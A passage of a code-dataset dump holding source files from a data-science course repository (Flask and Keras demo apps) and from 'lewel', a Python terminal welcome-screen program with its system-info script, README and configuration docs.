Reinstall or find configuration in README\" + END)\n sys.exit(0)\n\n\ndef open_image():\n try:\n abs_path = os.path.join(main_directory, shadow_image)\n with open(abs_path, \"r\") as image_file:\n return image_file.readlines()\n except FileNotFoundError:\n print(\"Image file doesn't exist. Try reinitializing program with \" +\n LIGHT.green + \"lewel init\" + END + \" and then adding a prexel or an image\")\n sys.exit(0)\n\n\ndef system_image():\n image_lines = open_image()\n for line in image_lines:\n print(' ' * space_before, end='')\n print(line, end='')\n print()\n\n\ndef system_message():\n import detailer\n details = detailer.detail_list()\n for line in details:\n print(' ' * space_before, end='')\n print(line, end='\\n')\n\n\ndef system_message_image():\n import detailer\n details = detailer.detail_list()\n image_lines = open_image()\n length = 0\n if len(image_lines) > len(details):\n length = len(image_lines)\n diff = len(image_lines) - len(details)\n details.extend([\"\"] * diff)\n else:\n length = len(details)\n diff = len(details) - len(image_lines)\n spacer = ' ' * (len(image_lines[0].split(' ')) - 1)\n image_lines.extend([spacer] * diff)\n for line in range(length):\n print(' ' * space_before, end='')\n print(image_lines[line].replace('\\n', ''), end='')\n print(' ' * space_after, end='')\n print(details[line], end='\\n')\n\n\ndef run_lewel():\n print('\\n' * lines_before, end='')\n if should_display_image == True and should_display_text == True:\n system_message_image()\n if should_display_image == False and should_display_text == True:\n system_message()\n if should_display_image == True and should_display_text == False:\n system_image()\n if should_display_text == False and should_display_blocks == True:\n system_message()\n print('\\n' * lines_after, end='')\n\n\ndef setup_lewel():\n import imager\n import detailer\n print()\n choice = input(LIGHT.green +\n \"Do you want to upload a prexel (1) an image (2) or just reinitialize (ANY)? \" +\n END)\n if choice == \"1\": # PREXEL IMPORT\n from shutil import copyfile\n print(LIGHT.magenta + \"\\n(1) Using custom prexel image... \" + END, end='')\n try:\n path = input(LIGHT.yellow + \"Enter prexel path: \" + END)\n abs_plew = os.path.join(main_directory, shadow_image)\n copyfile(path, abs_plew)\n except FileNotFoundError:\n print(LIGHT.red + \"\\n!!! No valid file provided !!!\" + END)\n elif choice == \"2\": # IMAGE IMPORT\n print(LIGHT.magenta + \"\\n(2) Using normal picture:\" + END, end='\\n')\n print(LIGHT.red + \"\\n!!! In number of cursor columns and cursor rows !!!\" + END, end='\\n')\n width = 0\n height = 0\n while True:\n try:\n width = int(input(LIGHT.yellow + \"\\nWIDTH: \" + END))\n height = int(input(LIGHT.yellow + \"\\nHEIGHT: \" + END))\n break\n except ValueError:\n print(LIGHT.red + \"\\nOne of the values entered is not an integer\" + END)\n try:\n path = input(LIGHT.yellow + \"\\nEnter photo path: \" + END)\n image = imager.create_image(path, width, height)\n imager.write_image(image)\n except FileNotFoundError:\n print(LIGHT.red + \"\\n!!! 
No valid file provided !!!\" + END)\n abs_path = os.path.join(main_directory, \".assist/details.json\")\n with open(abs_path, \"w\", encoding=\"utf-8\") as detail_file:\n init_data = {\n 'userstring': detailer.get_userstring(),\n 'osstring': detailer.get_osstring(),\n 'make_manufacture': detailer.get_make_manufacture(),\n 'shellstring': detailer.get_shellstring()\n }\n dump(init_data, detail_file, ensure_ascii=False, indent=4)\n\n\ndef config_lewel():\n class TooBigError(Exception):\n pass\n\n class UnfinishedProcessError(Exception):\n pass\n from yaml import safe_load\n yaml_path = os.path.join(main_directory, \"config/.config_options.yaml\")\n try:\n with open(yaml_path, 'r') as config_options_file:\n yaml_data = safe_load(config_options_file)\n except FileNotFoundError:\n print(LIGHT.red + \"Configuration options file missing. Reinstall or find options list\\n\" + END)\n sys.exit(0)\n for i, (key, value) in enumerate(config_data.items()):\n print(LIGHT.magenta + \"[%d]\" %\n (i + 1) + LIGHT.yellow + \" %s\" % key + END)\n print(NORMAL.red + \"[0]\" + LIGHT.red + \" to cancel\" + END)\n while True:\n while True:\n try:\n choice = input(LIGHT.green +\n \"\\nChoose a property to configure...\\nPress [0] to save or [h] for help: \" +\n LIGHT.magenta)\n if choice == \"h\":\n raise UnfinishedProcessError\n elif int(choice) > len(config_data.items()):\n raise TooBigError\n break\n except UnfinishedProcessError:\n for i, (key, value) in enumerate(config_data.items()):\n print(LIGHT.magenta + \"[%d]\" %\n (i + 1) + LIGHT.yellow + \" %s\" % key + END)\n except TooBigError:\n print(NORMAL.red + \"\\nERROR: Option doesn't exist\" + END)\n except ValueError:\n print(NORMAL.red + \"\\nERROR: Not a number\" + END)\n if int(choice) == 0:\n print(\n LIGHT.red + \"\\nSaving changes and quitting command line configuration wizard\" + END)\n break\n key, value = list(config_data.items())[int(choice) - 1]\n option_value = list(yaml_data.values())[int(choice) - 1]\n if type(value) is list:\n value = \"[\" + ', '.join(value) + \"]\"\n print(\"\\n\" + LIGHT.blue + key + \": \" +\n LIGHT.yellow + str(value) + END, end=\"\\n\")\n COLORS = {\n \"black\": \"\\x1b[30m\",\n \"red\": \"\\x1b[31m\",\n \"green\": \"\\x1b[32m\",\n \"yellow\": \"\\x1b[33m\",\n \"blue\": \"\\x1b[34m\",\n \"magenta\": \"\\x1b[35m\",\n \"cyan\": \"\\x1b[36m\",\n \"white\": \"\\x1b[37m\",\n \"light black\": \"\\x1b[90m\",\n \"light red\": \"\\x1b[91m\",\n \"light green\": \"\\x1b[92m\",\n \"light yellow\": \"\\x1b[93m\",\n \"light blue\": \"\\x1b[94m\",\n \"light magenta\": \"\\x1b[95m\",\n \"light cyan\": \"\\x1b[96m\",\n \"light white\": \"\\x1b[97m\"\n }\n while True:\n valid_options = option_value[1:-1].split('/')\n new_value = input(LIGHT.red + \"Enter [TAB] to go back\\nEnter your new value %s: \" % option_value +\n LIGHT.yellow)\n if new_value == \"\\t\":\n break\n if (any(option in new_value for option in valid_options) and\n option_value != \"(<percent/values/both>, <GB/MiB>)\") or option_value == \"(anything/[ENTER])\":\n config_data[key] = new_value\n break\n elif option_value == \"(color)\":\n if any(color in new_value for color in list(COLORS.keys())):\n config_data[key] = new_value\n break\n else:\n print(NORMAL.red +\n \"\\nWrong color, see the following valid colors:\")\n all_colors = []\n for color in list(COLORS.keys()):\n all_colors.append(\n COLORS[color] + \"[\" + color + \"]\" + END)\n normal_colors = all_colors[0:8]\n light_colors = all_colors[8:]\n for i in range(int(len(all_colors) / 2)):\n print(light_colors[i] + 
\"\\t\" +\n normal_colors[i], end='\\n')\n print()\n elif option_value == \"(number)\":\n try:\n config_data[key] = int(new_value)\n break\n except ValueError:\n print(NORMAL.red + \"\\nERROR: Not a number\\n\" + END)\n elif option_value == \"(<percent/values/both>, <GB/MiB>)\":\n arrayed_option = option_value[1:-1].split(', ')\n arrayed_option = [arrayed_option[i]\n [1:-1].split('/') for i in range(2)]\n user_option = new_value[1:-1].split(', ') \\\n if any(bracket in new_value for bracket in ['[', ']']) else new_value.split(', ')\n if len(user_option) > 1:\n if (user_option[0] in arrayed_option[0]) and (user_option[1] in arrayed_option[1]):\n config_data[key] = user_option\n break\n else:\n print(NORMAL.red + \"\\n1 or more of the options \" + LIGHT.red +\n \"[%s, %s]\" % (user_option[0], user_option[1]) + NORMAL.red +\n \" dont match the suggested options\\n\" + END)\n else:\n print(NORMAL.red +\n \"\\nNot enough options added. Type the 2 suggested options separated by a comma\\n\" +\n END)\n else:\n print(NORMAL.red + \"\\nERROR: Wrong choice, see options in brackets\\n\")\n if new_value != \"\\t\":\n if str(value).find(\"[\") != -1 and new_value.find(\"[\") == -1:\n new_value = \"[\" + new_value + \"]\"\n print(LIGHT.green + key + \": \" + LIGHT.yellow + new_value + END)\n else:\n print(LIGHT.magenta + \"\\nGoing back to selection menu...\" + END)\n print(\"\\n--- --- --- --- --- ---\")\n with open(json_path, 'w') as config_file:\n for k in list(config_data.keys()):\n if config_data[k] == \"true\":\n config_data[k] = True\n if config_data[k] == \"false\":\n config_data[k] = False\n if config_data[k] == \"null\":\n config_data[k] = None\n dump(config_data, config_file, indent=4)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n if sys.argv[1] == \"init\":\n try:\n setup_lewel()\n except KeyboardInterrupt:\n print(LIGHT.red + \"\\n\\nYou've quit the application\" + END)\n sys.exit(0)\n elif sys.argv[1] == \"reset\":\n abs_plew = os.path.join(main_directory, shadow_image)\n abs_json = os.path.join(main_directory, \".assist/details.json\")\n try:\n os.remove(abs_plew)\n except FileNotFoundError:\n print(LIGHT.red + \"Image doesn't exist... trying other\\n\" + END)\n try:\n os.remove(abs_json)\n except FileNotFoundError:\n print(LIGHT.red +\n \"Detail metadata doesn't exist... trying other\\n\" + END)\n print(LIGHT.red + \"You've reseted your application. Use \" +\n LIGHT.green + \"lewel init\" + LIGHT.red + \" to initialize your welcome screen\" + END)\n elif sys.argv[1] == \"config\":\n from subprocess import call\n if len(sys.argv) == 3:\n if sys.argv[2] == \"vim\":\n call([\"vim\", json_path])\n elif sys.argv[2] == \"open\":\n call([\"open\", json_path])\n else:\n try:\n config_lewel()\n except KeyboardInterrupt:\n print(NORMAL.red + \"\\n\\nYou've quit the application\" + END)\n sys.exit(0)\n elif sys.argv[1] == \"help\":\n abs_help = os.path.join(main_directory, \".assist/.help\")\n from subprocess import call\n call([\"cat\", abs_help])\n else:\n print(LIGHT.red + \"The command \" +\n LIGHT.green + \"lewel <%s> \" % sys.argv[1] +\n LIGHT.red + \"doesn't exist. 
Try running \" +\n LIGHT.green + \"lewel help\" +\n LIGHT.red + \" for a list of valid commands\" + END)\n else:\n run_lewel()\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6558823585510254, "avg_line_length": 21.66666603088379, "blob_id": "d77bf687f01b7a57ff417211615db39a30d924e9", "content_id": "f4acde3506ca0051108c8e9239e8aad78da31a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 73, "num_lines": 15, "path": "/setup.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\nfrom package import Package\n\nsetup(\n name='lewel',\n description='simple welcome screen and diagnostic program for shell',\n version='1.0',\n license='MIT',\n author='donovan',\n author_email='[email protected]',\n packages=find_packages(),\n cmdclass={\n \"package\": Package\n }\n)\n" }, { "alpha_fraction": 0.49696528911590576, "alphanum_fraction": 0.5365380048751831, "avg_line_length": 29.511110305786133, "blob_id": "1d23b36cb180cc4373c7e5d736d6a3a7f76101ce", "content_id": "76324e78be4af4d13a781050ba6eb3a653538f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4119, "license_type": "no_license", "max_line_length": 81, "num_lines": 135, "path": "/bin/imager.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "import sys\n\n\nclass LIGHT:\n black = \"\\x1b[90m\"\n red = \"\\x1b[91m\"\n green = \"\\x1b[92m\"\n white = \"\\x1b[97m\"\n\n\nEND = \"\\x1b[0m\"\npixel_row = \"\"\npixel_rows = []\n\n\ndef reproduce_image(path_to_img): # create img array\n from PIL import Image\n try:\n image = Image.open(path_to_img)\n except FileNotFoundError:\n exit(LIGHT.red + \"\\n!!! Image doesn\\'t exist, check for error !!!\" + END)\n image = image.resize((50, 20), Image.ANTIALIAS)\n image.save(\"new.png\")\n\n\ndef create_image(path_to_img, width, height): # create img array\n from PIL import Image\n from numpy import asarray\n try:\n image = Image.open(path_to_img)\n except FileNotFoundError:\n exit(LIGHT.red + \"\\n!!! 
Image doesn\\'t exist, check for error !!!\" + END)\n image = image.resize((width, height), Image.ANTIALIAS) # (w,h)\n return asarray(image)\n\n\ndef rgb_xterm(r, g, b): # converts RGB to xterm 256\n if r == g == b:\n if r < 8:\n return str(16)\n if r > 248:\n return str(231)\n return str(round(((r - 8) / 247) * 24) + 232)\n return str(16 + (36 * round(r / 255 * 5)) +\n (6 * round(g / 255 * 5)) +\n round(b / 255 * 5))\n\n\ndef rgb_xterm_array(r, g, b): # converts RGB to xterm RGB values\n if r == g == b:\n if r < 8:\n return str(16)\n if r > 248:\n return str(231)\n return str(round(((r - 8) / 247) * 24) + 232)\n return [\n 16 + (36 * round(r / 255 * 5)),\n (6 * round(g / 255 * 5)),\n round(b / 255 * 5)\n ]\n\n\ndef print_image(image): # prints image pixels\n rows, columns, _ = image.shape\n global pixel_row\n for x in range(rows):\n print(' ', end='')\n for y in range(columns):\n r, g, b = image[x][y]\n pixel_row += \"\\x1b[48;5;{}m \\x1b[0m\".format(\n str(rgb_xterm(r, g, b)))\n print(pixel_row, end='', flush=True)\n pixel_row = \"\"\n print('')\n\n\ndef write_image(image): # write img to output file\n import os\n rows, columns, _ = image.shape\n global pixel_row\n global pixel_rows\n abs_path = os.path.join(os.path.dirname(__file__), \".assist/.plew\")\n with open(abs_path, \"w\") as file:\n for x in range(rows):\n for y in range(columns):\n r, g, b = image[x][y]\n pixel_row += \"\\x1b[48;5;{}m \\x1b[0m\".format(rgb_xterm(r, g, b))\n pixel_rows.append(pixel_row)\n pixel_row = \"\"\n file.write('\\n'.join(pixel_rows))\n\n\ndef read_image(output_file): # read output file\n with open(output_file, \"r\") as file:\n print(file.read())\n\n\ndef print_256(): # show all 256 colors\n for i in range(256):\n print(\"\\x1b[48;5;%dm %d \\x1b[0m|\" % (i, i), end='')\n print()\n\n\n# width/height arguments arrive as strings from argv, so cast them to int\nif __name__ == '__main__' and len(sys.argv) >= 3:\n file = sys.argv[2]\n if sys.argv[1] == \"read\":\n read_image(file)\n elif sys.argv[1] == \"write\":\n write_image(create_image(file, int(sys.argv[3]), int(sys.argv[4])))\n elif sys.argv[1] == \"print\":\n print_image(create_image(file, int(sys.argv[3]), int(sys.argv[4])))\n elif sys.argv[1] == \"reproduce\":\n reproduce_image(file)\n elif sys.argv[1] == \"matrix\":\n import numpy\n numpy.set_printoptions(threshold=sys.maxsize)\n print(create_image(file, int(sys.argv[3]), int(sys.argv[4]))) # > matrix.txt\n elif sys.argv[1] == \"rgb256\":\n r, g, b = map(int, sys.argv[2].split(','))\n print(r, g, b)\n print(rgb_xterm_array(r, g, b))\n print(rgb_xterm(r, g, b))\nelif len(sys.argv) == 2 and sys.argv[1] == \"showall\":\n print_256()\n\n\n\"\"\" ANSI Escape Code: https://notes.burke.libbey.me/ansi-escape-codes/\n \\x1b[48;5;{}m \\x1b[0m\n \\x1b[ - call function\n 48;5;{} - function parameters... 48;5;{} set bg to {}\n m - function name... m: set graphic\n 48;5;{}m - function example: m(48, 5, {})\n \\x1b[0m - function m(0) to turn off control sequence\n The space between the beginning and ending control sequences\n includes space character to color just the background \"\"\"\n" } ]
6
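imager.py in the record above maps each pixel's RGB value to an xterm-256 color index and paints it with a `\x1b[48;5;<n>m` background escape. Below is a minimal standalone sketch of that same mapping, mirroring the repo's `rgb_xterm` logic (6x6x6 color cube at indices 16-231, grayscale ramp at 232-255); the demo colors in the `__main__` block are illustrative assumptions, not values taken from the repo.

```python
# Minimal sketch of the RGB -> xterm-256 mapping used by imager.py.
# Cube colors 16-231: 16 + 36r + 6g + b with each channel scaled to 0..5.
# Grayscale ramp 232-255 handles near-equal channels.
def rgb_to_xterm(r, g, b):
    if r == g == b:                 # grayscale shortcut
        if r < 8:
            return 16               # darkest cube entry
        if r > 248:
            return 231              # lightest cube entry
        return 232 + round((r - 8) / 247 * 24)
    return (16 + 36 * round(r / 255 * 5)
            + 6 * round(g / 255 * 5)
            + round(b / 255 * 5))


if __name__ == "__main__":
    # Demo colors are assumptions, not from the repo.
    for rgb in [(255, 0, 0), (0, 128, 255), (120, 120, 120)]:
        n = rgb_to_xterm(*rgb)
        # \x1b[48;5;<n>m sets the background; \x1b[0m resets it.
        print("\x1b[48;5;{}m  \x1b[0m {} -> {}".format(n, rgb, n))
```

lewel writes rows of such escape-painted spaces to `.assist/.plew` at `lewel init` time and simply replays that file on each launch, so the conversion cost is paid only once.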
kenantr37/K-Nearest-Neighbors
https://github.com/kenantr37/K-Nearest-Neighbors
a410cfe29cdb2263a43bf9e30e115cbcc047e492
339fc1fafd714cadd4a75e5c1451447faf96a955
28686b8ea605b4d96ee7bc35b04adc3c38357fdb
refs/heads/main
2023-02-13T09:07:15.182509
2021-01-04T19:49:11
2021-01-04T19:49:11
326,785,489
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7302185297012329, "alphanum_fraction": 0.7980406880378723, "avg_line_length": 93.78571319580078, "blob_id": "f004b326283ac031b6e4afe9b7b456453d6d3a42", "content_id": "909556e4f22547b2578595b89f99d2d39c1eb930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 464, "num_lines": 14, "path": "/README.md", "repo_name": "kenantr37/K-Nearest-Neighbors", "src_encoding": "UTF-8", "text": "# K-Nearest Neighbors\n### A short summary of the K-Nearest Neighbors Algorithm\nKNN is called \"the simplest algorithm\" machine learning algorithm used for classification and regression.The algorithm makes predictions by calculating similarity between the input sample and each training instance. It calculates the distance between the new instance and it's neighbors and then decide the class of this instance from K nearest neighbors.\n\n### Summary for my simple project\nIn my sample, there is a dataset which is about California Housing Prices I downloaded from Kaggle. Despite of the prediction, I wanted to look at accuracy of the prediction but as I saw, accuracy of the prediction could be off from high accuracy score when features' amount would be large. This is because, I could get much more proper accuracy from less rows features and in my project's dataset there are 20433 rows. Probably it's my mistake but I'm learning :)\n\n#### This is my sample with 20433 lines rows : \n\n![Screenshot_1](https://user-images.githubusercontent.com/44119225/103572495-bb2d9e00-4edd-11eb-8b44-713e2679c33d.jpg)\n\n#### and this is my previous sample which has 500 lines rows . Prediction accuracy is quite normal :)\n\n![Screenshot_2](https://user-images.githubusercontent.com/44119225/103572709-1495cd00-4ede-11eb-94c2-0037a2b25894.jpg)\n" }, { "alpha_fraction": 0.7179356217384338, "alphanum_fraction": 0.7353091239929199, "avg_line_length": 47.95000076293945, "blob_id": "de5666cc2c1a587c6ab2ddc9853e5a51cd6a78c5", "content_id": "60a05d82df1c3663da73005df4e565a5fbf19b05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1957, "license_type": "no_license", "max_line_length": 107, "num_lines": 40, "path": "/housing_prices_sample.py", "repo_name": "kenantr37/K-Nearest-Neighbors", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 4 11:32:14 2021\n\n@author: Zeno\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split # to split the data as test and train\nfrom sklearn.preprocessing import StandardScaler # to normalize the data\nfrom sklearn.neighbors import KNeighborsClassifier # to create KNN model\n# I wanted to predict median_house_value by using other features with KNN algorithm\ndata = pd.read_csv(\"D:/Machine Learning Works/K-Neirest Neighbour (KNN)/housing.csv\")\ndata.dropna(inplace = True) # There are a few NaN values our features\ndata.drop([\"ocean_proximity\"],axis = 1,inplace = True) # I drop the last column 'cause I won't use it\n# y is median_house_value\ny = data.median_house_value\n# x is other features\nx = data.drop([\"median_house_value\"],axis = 1 ,inplace = False)\n# Now, we can normalize x features' values'\nx_normalized = StandardScaler().fit(x).transform(x)\n# splitting data as train and test\nx_test,x_train,y_test,y_train = train_test_split(x,y,test_size = 0.2,random_state = 1 )\n# Let's create KNN 
model\n# I decided 3 neighbours for initial value but I'll look which value is much more proper for neigbour value\nknn_model = KNeighborsClassifier(n_neighbors = 3).fit(x_train,y_train)\n# for the last thing, we can look at the score of the accuracy\nprint(\"for neighbour value is {}, score is {} \".format(3,knn_model.score(x_test,y_test)))\n# We need to find the best n value and for this we could make a loop\naccuracy_score=[] #to see which n value is better\nfor each in range(500,509):\n knn_model_2 = KNeighborsClassifier(n_neighbors=each).fit(x_train,y_train)\n prediction_2 = knn_model_2.predict(x_test)\n print(\"when n is {}, score is {} \".format(each,knn_model_2.score(x_test,y_test)))\n accuracy_score.append(knn_model_2.score(x_test,y_test))\nplt.plot(range(1,10),accuracy_score)\nplt.xlabel(\"range\")\nplt.ylabel(\"accuracy\")\nplt.show()" } ]
2
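The README in the record above describes the K-nearest-neighbors rule: measure the distance from a new instance to every training instance, then take the majority class among the K closest. A from-scratch sketch of that rule on toy 2-D points follows; all data and labels below are illustrative stand-ins, not the California Housing dataset, and `math.dist` assumes Python 3.8+.

```python
# From-scratch sketch of the KNN rule described in the README above:
# sort training points by distance to the query, then vote among the k nearest.
import math
from collections import Counter


def knn_predict(train_x, train_y, query, k=3):
    # (distance, label) pairs sorted by ascending distance
    neighbors = sorted(
        (math.dist(point, query), label)
        for point, label in zip(train_x, train_y)
    )
    votes = [label for _, label in neighbors[:k]]
    return Counter(votes).most_common(1)[0][0]


# Toy 2-D points: two well-separated clusters (illustrative only).
train_x = [(1.0, 1.0), (1.2, 0.8), (0.9, 1.1), (8.0, 9.0), (8.5, 8.7), (7.9, 9.2)]
train_y = ["low", "low", "low", "high", "high", "high"]
print(knn_predict(train_x, train_y, (1.1, 0.9)))  # -> low
print(knn_predict(train_x, train_y, (8.2, 8.9)))  # -> high
```

scikit-learn's `KNeighborsClassifier`, used in housing_prices_sample.py above, implements the same rule with faster neighbor search structures.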
kairok/Django-Url-Status
https://github.com/kairok/Django-Url-Status
240efbb8bfc926e493220fb3bbe2d2fd892eec14
c1f9743aaeab95dbf01955ff3fe7e160663664bc
550e71a9e0a7c89f1b481bfedfe626c7e3256ef0
refs/heads/master
2020-04-07T02:30:13.174710
2018-11-17T11:54:03
2018-11-17T11:54:03
157,979,147
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5443786978721619, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 18.875, "blob_id": "3d5bbd568b4d6e5a3c3a8b56cc2ffd49c8550a26", "content_id": "aa22f5cb05964f88c5b0a901942d30d9cc58a03a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/readme.md", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "Django 1.9 Site\r\n\r\nSite check URL status code\r\n\r\n http://127.0.0.1:8000/post/\r\nDjango admin http://127.0.0.1:8000/admin/\r\n\r\nUser default admin password qwerty123\r\n\r\n" }, { "alpha_fraction": 0.7528089880943298, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 16.799999237060547, "blob_id": "bc62f0c1ea0477444eec3f26af182c6adf2f7fa1", "content_id": "c2e0ef6c650b36dafd2e972196d88c2bf998276c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/Urllist/apps.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass UrllistConfig(AppConfig):\n name = 'Urllist'\n" }, { "alpha_fraction": 0.7030651569366455, "alphanum_fraction": 0.7088122367858887, "avg_line_length": 25.100000381469727, "blob_id": "8d055740953ba0a57cf307f2dda7c258cbfbf740", "content_id": "bb6c0d32be2ad4cdb54e7a88d8ba79d51bca1b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 522, "license_type": "no_license", "max_line_length": 87, "num_lines": 20, "path": "/Urllist/models.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nfrom django.contrib.auth.models import User\n# from djoser.urls.base import User\n\n\n\nclass Links(models.Model):\n # Model Rooms\n\n creater = models.ForeignKey(User, verbose_name=\"Creater\", on_delete=models.CASCADE)\n url = models.CharField(\"URLS\", max_length=200)\n status=models.IntegerField()\n date = models.DateTimeField(\"Date created\", auto_now_add=True)\n\n\n class Meta:\n verbose_name=\"Link status\"\n verbose_name_plural=\"Links status\"\n" }, { "alpha_fraction": 0.6811145544052124, "alphanum_fraction": 0.6811145544052124, "avg_line_length": 22.14285659790039, "blob_id": "6e3d0c00ab8bd33c6c60347c0e7d488299b26f53", "content_id": "5e7e292d09dd2e5184fecfdb45de013cc0ef7d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 334, "license_type": "no_license", "max_line_length": 72, "num_lines": 14, "path": "/Urllist/admin.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom Urllist.models import Links\n\n\nclass LinksAdmin(admin.ModelAdmin):\n \"\"\"Комнаты чата\"\"\"\n list_display = (\"creater\", \"url\", \"date\")\n\n #def invited_user(self, obj):\n # return \"\\n\".join([user.username for user in obj.invited.all()])\n\n\n\nadmin.site.register(Links, LinksAdmin)" }, { "alpha_fraction": 0.7160000205039978, "alphanum_fraction": 0.7160000205039978, "avg_line_length": 26.77777862548828, "blob_id": "47127b5839ceb8c6cd77b7b53ef843a7cb60302c", "content_id": "a6afd2459eeb7178d9b38af4a5abdf1bcc412e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, 
"license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/Loginsys/urls.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n#from django.urls import path\nfrom django.conf.urls import include, url\nfrom Loginsys import views\n\nurlpatterns = [\n url(r'^login/', views.login, name='Login'),\n url(r'^logout/', views.logout, name='Logout'),\n]\n" }, { "alpha_fraction": 0.5809617042541504, "alphanum_fraction": 0.5986260771751404, "avg_line_length": 32.96666717529297, "blob_id": "bdd4a952439d5e9f45f1f019d73f9a2f74ce3910", "content_id": "43c07ba11b8fe4f0d083aad7c78f1db02cf14558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 145, "num_lines": 30, "path": "/UrlStatus/migrations/0001_initial.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.3 on 2018-11-15 15:09\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Links',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('url', models.CharField(max_length=200, verbose_name='URLS')),\n ('date', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),\n ('creater', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Creater')),\n ],\n options={\n 'verbose_name': 'Link status',\n 'verbose_name_plural': 'Links status',\n },\n ),\n ]\n" }, { "alpha_fraction": 0.7217044234275818, "alphanum_fraction": 0.7263648509979248, "avg_line_length": 27.903846740722656, "blob_id": "cb93c999655356148004be988b05014689b1176b", "content_id": "d9b3b0e5ed4a11a4ed73c1ce8031d8a98e43bdd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 91, "num_lines": 52, "path": "/Urllist/views.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nimport os\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\nfrom django.views.generic.detail import DetailView\nfrom django.http import FileResponse\nfrom django.http import Http404\n# Create your views here.\nfrom .models import Links\nfrom datetime import datetime\n#from pytz import timezone\nfrom django.utils import timezone\nfrom django.contrib import auth\nimport urllib.request\nimport requests\n\n\ndef index(request):\n\n if len(auth.get_user(request).username)==0:\n return render_to_response('index.html')\n clients = Links.objects.filter(creater=auth.get_user(request))\n check_status(clients)\n clients = Links.objects.filter(creater=auth.get_user(request))\n\n data = {\"clients\": clients, \"username\": auth.get_user(request)} #, \"group\":clientsgroup\n return render(request, \"index.html\", context=data)\n\n\ndef check_status(clients):\n #clients = Links.objects.filter(creater=auth.get_user(client))\n\n for userl in clients:\n URL = 
userl.url\n #response = urllib.request.urlopen(URL)\n try:\n response = requests.get(URL)\n print(response.status_code)\n status=response.status_code\n except:\n status=404\n\n updated_rows = Links.objects.filter(id=userl.id).update(status=status)\n\n\n return" } ]
7
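Urllist/views.py in the record above polls each stored link with `requests.get` and records 404 when the request fails. Below is a standalone sketch of that check, decoupled from the Django models; the 5-second timeout and the example URLs are assumptions added here, and the repo's bare `except` is narrowed to `requests.RequestException`.

```python
# Standalone sketch of the status-check loop in Urllist/views.py.
import requests


def check_status(url, timeout=5):
    """Return the HTTP status code, or 404 on any request failure."""
    try:
        return requests.get(url, timeout=timeout).status_code
    except requests.RequestException:
        # The repo records any failure as 404; kept here for parity.
        return 404


if __name__ == "__main__":
    # Example URLs are placeholders, not rows from the repo's database.
    for url in ("https://example.com", "http://127.0.0.1:1/unreachable"):
        print(url, "->", check_status(url))
```

In the repo this logic runs once per saved link inside the `index` view, which then re-reads the `Links` queryset so the page shows the freshly stored codes.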
topliugang/oa
https://github.com/topliugang/oa
2e9876176cc830404b840323c66a011168ba8067
d5492d946281809db8274d31e2a112a2fb049f69
1ae1635fb4281e507554723b3a8225730dd0952c
refs/heads/master
2021-01-13T00:33:52.053703
2017-02-24T06:45:18
2017-02-24T06:45:18
81,397,002
0
0
null
null
null
null
null
